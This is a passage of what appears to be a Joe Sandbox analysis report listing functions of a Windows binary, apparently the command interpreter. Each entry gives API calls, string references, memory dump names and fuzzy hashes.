SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00007FF7823F89AC
SetLocalTime.API-MS-WIN-CORE-SYSINFO-L1-1-0 ref: 00007FF7823F89BD
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823F89D1

Strings

/-., xrefs: 00007FF7823F873E
:, xrefs: 00007FF7823F87B7
%s, xrefs: 00007FF7823F88B9

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: LocalTime$ErrorLast_get_osfhandle
String ID: %s$/-.$:
API String ID: 1644023181-879152773
Opcode ID: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
Instruction ID: 55f64a30a7f0fa088b8cf0ff2a5a025a13436822ebc8f6f87fc42c90d90ecf1c
Opcode Fuzzy Hash: 52adc4b69c0d6b0cc37f226843e3bc06c06473f0745bac629c27b33a4c267472
Instruction Fuzzy Hash: B691B662B0874291EF54AB11E4606BDE7A0FF44B86FE44079D94E43AD4DFBCD945C720

Function 00007FF7823F627C Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 95synchronizationCOMMON

Download Yara Rule

APIs

WaitForSingleObject.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,00000000,00007FF7823F7251), ref: 00007FF7823F628E

Strings

wil, xrefs: 00007FF7823F63D2

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: ObjectSingleWait
String ID: wil
API String ID: 24740636-1589926490
Opcode ID: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
Instruction ID: fc056034f913fcfc78a963601c72a5275e210f0c6173b07b6544f1cc600ac2d4
Opcode Fuzzy Hash: ea3b1f99615cb6da41309659edc9fe07f1318ac417b21432a0effa90e1671882
Instruction Fuzzy Hash: BE416421A0854283FB606B11F410279AAA1FF85782FF4A175D92D46EA4CFBDE944CB21

Function 00007FF7823FCDC0 Relevance: 15.8, APIs: 6, Strings: 3, Instructions: 94windowCOMMON

Download Yara Rule

APIs

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823FCE20
_ultoa.MSVCRT ref: 00007FF7823FCE43
GetACP.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823FCE4F
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7823FCE84
FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0 ref: 00007FF7823FCEDE
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0 ref: 00007FF7823FCF24

Strings

System, xrefs: 00007FF7823FCE90
, xrefs: 00007FF7823FCE64
Application, xrefs: 00007FF7823FCEAB

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: FormatMessage$ByteCharFreeLocalMultiWide_ultoa
String ID: $Application$System
API String ID: 3377411628-1881496484
Opcode ID: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
Instruction ID: 190a20b37dc52e836db3eca7106f7b87bf2fb8a659a0017294e05663cd045eb5
Opcode Fuzzy Hash: 80d38d575318b3867918aa38a6e3db8ef172391286b4c5249a392e05da5dfb20
Instruction Fuzzy Hash: 4841A932B04B029AE750AB60E4103EDBBB0FB88749F944139DE0E03B58EF78D545C720

Function 00007FF7823D14E8 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 64COMMON

Download Yara Rule

APIs

GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,00007FF7823D1829), ref: 00007FF7823D1513
RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0(?,?,?,?,?,?,?,00007FF7823D1829), ref: 00007FF7823D152B
GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823EAB0F
GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823EAB29
SetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823EAB4E
RemoveDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823EAB65

Strings

\, xrefs: 00007FF7823EAAFC
:, xrefs: 00007FF7823EAAF0

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: AttributesDirectoryFileRemove$ErrorFullLastNamePath
String ID: :$\
API String ID: 3961617410-1166558509
Opcode ID: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
Instruction ID: 74208f4952e02f82228475dbd3fe48514ed388dd721f5e7410134a64981e2748
Opcode Fuzzy Hash: 7382dc9ba5dd15d1d826e80cca2a433ebb6210e0cfd6d3e104106e7a41e883e1
Instruction Fuzzy Hash: EE21F921E0C642C7E7606B61A45407DFEA2FF49B56BE48579D94F43B90DFBCD848C620

Function 00007FF7823D7AA0 Relevance: 15.2, APIs: 10, Instructions: 221COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823D7B13
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D7B5F
CreateDirectoryW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D7B83
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823D7BA9

Part of subcall function 00007FF7823E291C: GetDriveTypeW.KERNELBASE ref: 00007FF7823E294A

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CreateDirectoryDriveFullNamePathTypememset
String ID:
API String ID: 1397130798-0
Opcode ID: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
Instruction ID: 57d471c4f2ba5fccf90c25469c23cc173e073fa849c76fc0a51b0cec0486638e
Opcode Fuzzy Hash: 53223a99652f8e81a4eeb04428d23ca491e991d1bc8129b69f2a7ec7696704bc
Instruction Fuzzy Hash: 6491C626B0878196EB64AB11D8602B9F7A1FF84B86FE48079D94D03F94DF7CD945C320

Function 00007FF7823E258C Relevance: 15.1, APIs: 5, Strings: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823E06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E06D6
Part of subcall function 00007FF7823E06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E06F0
Part of subcall function 00007FF7823E06C0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E074D
Part of subcall function 00007FF7823E06C0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(?,?,00000000,00007FF7823DB4DB), ref: 00007FF7823E0762

_wcsicmp.MSVCRT ref: 00007FF7823E25CA
_wcsicmp.MSVCRT ref: 00007FF7823E25E8
_wcsicmp.MSVCRT ref: 00007FF7823E260F
_wcsicmp.MSVCRT ref: 00007FF7823E2636
_wcsicmp.MSVCRT ref: 00007FF7823E2650

Strings

CMDEXTVERSION, xrefs: 00007FF7823E2608
ERRORLEVEL, xrefs: 00007FF7823E25C3
EXIST, xrefs: 00007FF7823E25E1
DEFINED, xrefs: 00007FF7823E262F
NOT, xrefs: 00007FF7823E2649

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: _wcsicmp$Heap$AllocProcess
String ID: CMDEXTVERSION$DEFINED$ERRORLEVEL$EXIST$NOT
API String ID: 3407644289-1668778490
Opcode ID: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
Instruction ID: 7eb77516207518b12177e08c7266728d34822702b22f5b87aead7c80e9ba8641
Opcode Fuzzy Hash: 73bc52d87adb43f98016766748090f79ae3978062519f174c0f235f90d2ce4d7
Instruction Fuzzy Hash: 4E317F65A0850295FB507F21E825279EAA4BF84B42FF4807AD90E57ED5CEFCE848C731

Function 00007FF782400C90 Relevance: 14.3, APIs: 7, Strings: 1, Instructions: 282COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF782401398: free.MSVCRT ref: 00007FF7824013C2
Part of subcall function 00007FF782401398: free.MSVCRT ref: 00007FF7824013DF

Part of subcall function 00007FF7823D2730: towupper.MSVCRT(00000000,00000000,00000000,00000000,00000000,0000000A,?,00007FF782400D54), ref: 00007FF7823D27C1

Part of subcall function 00007FF7823D91C0: memset.MSVCRT ref: 00007FF7823D921C
Part of subcall function 00007FF7823D91C0: wcsrchr.MSVCRT ref: 00007FF7823D92D8
Part of subcall function 00007FF7823D91C0: GetFileAttributesW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D9362
Part of subcall function 00007FF7823D91C0: GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 00007FF7823D9373

Part of subcall function 00007FF7823D8DF8: memset.MSVCRT ref: 00007FF7823D8E6D
Part of subcall function 00007FF7823D8DF8: memset.MSVCRT ref: 00007FF7823D8E93

Part of subcall function 00007FF7823E7854: memset.MSVCRT ref: 00007FF7823E790B

qsort.MSVCRT ref: 00007FF782400DDF
wcschr.MSVCRT ref: 00007FF782400E40
calloc.MSVCRT ref: 00007FF782400EA2
calloc.MSVCRT ref: 00007FF782400F5A
wcschr.MSVCRT ref: 00007FF782400F9E
memmove.MSVCRT ref: 00007FF782401001
memmove.MSVCRT ref: 00007FF782401021

Strings

&()[]{}^=;!%'+,`~, xrefs: 00007FF782400E39, 00007FF782400F97

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: memset$callocfreememmovewcschr$AttributesErrorFileLastqsorttowupperwcsrchr
String ID: &()[]{}^=;!%'+,`~
API String ID: 2516562204-381716982
Opcode ID: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
Instruction ID: 1bb1dea77367a6f9ddf20a61b3a2d09d60c539f1004a54ed8011d76f9f46ac1f
Opcode Fuzzy Hash: 46497fca5754c6479966f60d4708fe0825c75a770e24346d8a6fbe1751f9d7e4
Instruction Fuzzy Hash: A0C1F432A1475186E750AF21E85067DB7E0FB44B95FA41139EE8E13B95DFBCE890C720

Function 00007FF7823E7E80 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON

Download Yara Rule

APIs

Part of subcall function 00007FF7823DD3F0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD46E
Part of subcall function 00007FF7823DD3F0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823DD485
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD4EE
Part of subcall function 00007FF7823DD3F0: iswspace.MSVCRT ref: 00007FF7823DD54D
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD569
Part of subcall function 00007FF7823DD3F0: wcschr.MSVCRT ref: 00007FF7823DD58C

iswspace.MSVCRT ref: 00007FF7823E7EEE

Strings

A, xrefs: 00007FF7823F01B6

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: wcschr$Heapiswspace$AllocProcess
String ID: A
API String ID: 3731854180-3554254475
Opcode ID: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
Instruction ID: cf95fabd317e888f254d17b32ad112577b8b875cbff64ecdcfb321fcdf90f17f
Opcode Fuzzy Hash: 41f65c48cf3e37159ed1ee97e5992bf17c61e45d372bd9afbfce449b4f210755
Instruction Fuzzy Hash: FEA1A025A0968295EB60BB11E460279F7E0FF45792FB08078CA4D47B98DFBCE845CB31

Function 00007FF7823FA39C Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 111libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryExW.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7823FA3EA
GetProcAddress.API-MS-WIN-CORE-LIBRARYLOADER-L1-2-0 ref: 00007FF7823FA40C
ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF7823FA47B
ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF7823FA4D3
ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF7823FA508
ReadProcessMemory.API-MS-WIN-CORE-MEMORY-L1-1-0 ref: 00007FF7823FA54A

Strings

NtQueryInformationProcess, xrefs: 00007FF7823FA402
NTDLL.DLL, xrefs: 00007FF7823FA3E1

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: MemoryProcessRead$AddressLibraryLoadProc
String ID: NTDLL.DLL$NtQueryInformationProcess
API String ID: 1580871199-2613899276
Opcode ID: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
Instruction ID: 224d1ac0d4012eea79a6ecfb479d1b986fac0732fd3a3667147746ecfa9d14f7
Opcode Fuzzy Hash: 248bfccf7fce2d74e04c554d0a409a3469e52293056c2e4adbebd786e6cf1904
Instruction Fuzzy Hash: 3051C472B18B8286EB50AB16F810279B7E4FB88B86FA45135DE8E03B54DF7CD441C720

Function 00007FF7823D7420 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 101fileCOMMON

Download Yara Rule

APIs

_wcsicmp.MSVCRT ref: 00007FF7823D74A1
CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823D74E8
_open_osfhandle.MSVCRT ref: 00007FF7823D7509
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7823F4931

Strings

con, xrefs: 00007FF7823D748A

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: CloseCreateFileHandle_open_osfhandle_wcsicmp
String ID: con
API String ID: 689241570-4257191772
Opcode ID: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
Instruction ID: a68fd098ef20baad27440bf176e1c5d07678abea5647b6b944b6dafcb1733a5c
Opcode Fuzzy Hash: c7a2234d9573f6b473384a9ead2fa3a6435853c7d94b0c157743cf5a0c0f015b
Instruction Fuzzy Hash: AD41C432A0864586E350AF15A45437DFEA1F789BA6FA48338DA2D437D0CFBDD849C760

Function 00007FF7823FA58C Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 97memoryfileCOMMON

Download Yara Rule

APIs

CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FA5DC

Part of subcall function 00007FF7823FA8D4: ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FA8F1

SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823FA62E
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823FA68B
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823FA6A0
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0 ref: 00007FF7823FA6DE
RtlFreeHeap.NTDLL ref: 00007FF7823FA6F2
CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0 ref: 00007FF7823FA701

Strings

PE, xrefs: 00007FF7823FA65C

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Heap$File$Process$AllocCloseCreateFreeHandlePointerRead
String ID: PE
API String ID: 2941894976-4258593460
Opcode ID: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
Instruction ID: 42dfcbc13fef742ad03bb645c2002cbfce90960a01de3be3884c722fa9ac1c7a
Opcode Fuzzy Hash: 331757eb63d1f0c0e0f6f41cd200ca790172e856099f574e6941fdd4e3218fed
Instruction Fuzzy Hash: 7D41467260865186EA60AB11F420679FBA0FB89B92F948174DE5D03F95DFBCE845CB20

Function 00007FF7823E0010 Relevance: 13.7, APIs: 9, Instructions: 163fileCOMMON

Download Yara Rule

APIs

SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,0000237B,00000000,00000002,0000000A,00000001,00007FF7823F849D,?,?,?,00007FF7823FF0C7), ref: 00007FF7823E0045
AcquireSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0(?,?,?,00007FF7823FF0C7,?,?,?,?,?,?,00000002,00000000,?,?,0000002F,00007FF7823FE964), ref: 00007FF7823E0071
ReadFile.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E0092
ReleaseSRWLockShared.API-MS-WIN-CORE-SYNCH-L1-1-0 ref: 00007FF7823E00A7
SetFilePointer.API-MS-WIN-CORE-FILE-L1-1-0 ref: 00007FF7823E0148
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0 ref: 00007FF7823E0181

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: File$LockPointerShared$AcquireByteCharMultiReadReleaseWide
String ID:
API String ID: 734197835-0
Opcode ID: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
Instruction ID: 54a6fea25f0554cbc1e8db076c6d93870db0689d90459f37e9cefedb014b2075
Opcode Fuzzy Hash: 350a32b8b7773a328a2c6bfa9f033ab7091b859c3389a923f16ee056ea562ebb
Instruction Fuzzy Hash: 7D61B539A0C69296E720AB11E810339FAE1FB45B46FE48179DD4D17F90DFBCA849C720

Function 00007FF7823F9B0C Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 261registryCOMMON

Download Yara Rule

APIs

RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823F9B77
RegEnumKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823F9CD2
wcsrchr.MSVCRT ref: 00007FF7823F9D47
RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0 ref: 00007FF7823F9E38

Strings

., xrefs: 00007FF7823F9B96
\Shell\Open\Command, xrefs: 00007FF7823F9B8F, 00007FF7823F9DE6
%s=%s, xrefs: 00007FF7823F9C81, 00007FF7823F9E85

Memory Dump Source

Source File: 00000003.00000002.1677285381.00007FF7823D1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00007FF7823D0000, based on PE: true

Associated: 00000003.00000002.1677270056.00007FF7823D0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677317543.00007FF782402000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78240D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF782411000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677336374.00007FF78241F000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000003.00000002.1677390760.00007FF782429000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff7823d0000_alpha.jbxd

Similarity

API ID: Enum$Openwcsrchr
String ID: %s=%s$.$\Shell\Open\Command
API String ID: 3402383852-1459555574
Opcode ID: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
Instruction ID: b3cf75c0da3c4280646940c398443d32f0a217798d3b592001d0e3c9dda04d10
Opcode Fuzzy Hash: c43f82accf2197ad62986fa4fadf1decf1ac45d35886ea9e70cf93cd770afeea
Instruction Fuzzy Hash: 54A1E722A0874282EE11BB55E1602B9E3A0FF84B91FE44579DA4D07FD4EFBCE945C720

Function 00007FF7823E7610 Relevance: 12.5, APIs: 6, Strings: 1, Instructions: 228COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00007FF7823E768B
memset.MSVCRT ref: 00007FF7823E76B4

Part of subcall function 00007FF7823DCA40: memset.MSVCRT ref: 00007FF7823DCAB3

??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823E77F5
??_V@YAXPEAX@Z.MSVCRT ref: 00007FF7823E7815

